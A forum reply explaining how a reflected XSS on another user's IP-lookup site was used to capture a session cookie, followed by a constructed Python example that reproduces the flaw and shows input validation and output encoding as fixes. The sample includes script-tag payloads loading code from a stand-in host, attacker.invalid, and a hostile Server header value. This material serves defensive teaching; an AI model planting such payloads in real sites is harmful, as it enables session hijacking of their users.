bombshop wrote: Wow, that's nice work! Please let me understand: could you get the admin access only while my cookie was valid, or whenever you want? Thanks again, it is good to know that it is vulnerable.
Only when your cookie (session) was valid, which I believe is 24 minutes after you log out, by default. Basically, the link I sent you caused a redirect to my site along with your cookie in the URL, which I then logged. My script then sent you back to your main page, making it look like a simple redirect bug in your site. The XSS was reflected back on the search page because your site echoes back whatever I search for, largely unfiltered. You did a good job escaping quotes, but because of browsers' tendency to ignore bad markup, I was able to load an external script in a technically illegal way.
This is a good example of why defense-in-depth is a good idea. I would suggest filtering out any input that does not look like an IP address (there are tons of regex patterns for this), and HTML-encoding anything printed in the HTTP header results page. This second part is because even if the search error page is safe, the results may not be. I set up my page to deliver an XSS payload as its header, which I believe will be included in the results (and therefore the main page) when it is indexed.
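The two fixes suggested in the post above (reject anything that is not an IP address before searching, and HTML-encode everything that ends up on the header-results page), as an added worked example. This is not the poster's code or the site's code; the lookup page, the attacker payload, the `attacker.invalid` host and the `Server` header value are all constructed here to reproduce the pattern the thread describes: quotes are escaped but angle brackets are not, so a quote-free payload in the search term or in a remote site's response headers still lands in the page as markup.

```python
import html
import ipaddress

# Constructed sample inputs (hypothetical, not from the thread).
# Quote-free payload: escaping only ' and " does nothing to it.
PAYLOAD = "<script src=//attacker.invalid/x.js></script>"

# Headers a malicious target could serve so that they are stored and
# re-rendered on the results page (the second attack in the post).
EVIL_HEADERS = {
    "Server": "<script src=//attacker.invalid/h.js></script>",
    "Content-Type": "text/html",
}


def render_vulnerable(query: str, headers: dict) -> str:
    """Mirrors the weak behaviour described: only quotes are escaped,
    and header values are written into the table untouched."""
    q = query.replace('"', "&quot;").replace("'", "&#39;")
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in headers.items())
    return f"<p>Results for {q}</p><table>{rows}</table>"


def looks_like_ip(value: str) -> bool:
    """Input filter: accept only a literal IPv4 or IPv6 address.
    ipaddress.ip_address() is used instead of a hand-written regex
    because it rejects junk like '1.2.3.4<script>' and '1.2.3.999'."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def render_hardened(query: str, headers: dict) -> str:
    """Defense in depth: validate the search term, then HTML-encode the
    term AND every header name/value before they reach the page."""
    if not looks_like_ip(query):
        return "<p>Invalid address.</p>"
    q = html.escape(query, quote=True)
    rows = "".join(
        f"<tr><td>{html.escape(k, quote=True)}</td>"
        f"<td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in headers.items()
    )
    return f"<p>Results for {q}</p><table>{rows}</table>"


def script_tag_survives(rendered: str) -> bool:
    """True if a raw <script tag (attacker markup) made it into the HTML."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable, payload in query :", script_tag_survives(render_vulnerable(PAYLOAD, {})))
    print("vulnerable, payload in header:", script_tag_survives(render_vulnerable("203.0.113.7", EVIL_HEADERS)))
    print("hardened,   payload in query :", script_tag_survives(render_hardened(PAYLOAD, EVIL_HEADERS)))
    print("hardened,   payload in header:", script_tag_survives(render_hardened("203.0.113.7", EVIL_HEADERS)))
```

Note that the input filter alone would not have protected the results page: a valid IP address can still point at a host that answers with hostile headers, which is exactly why the post asks for encoding on output as well as filtering on input.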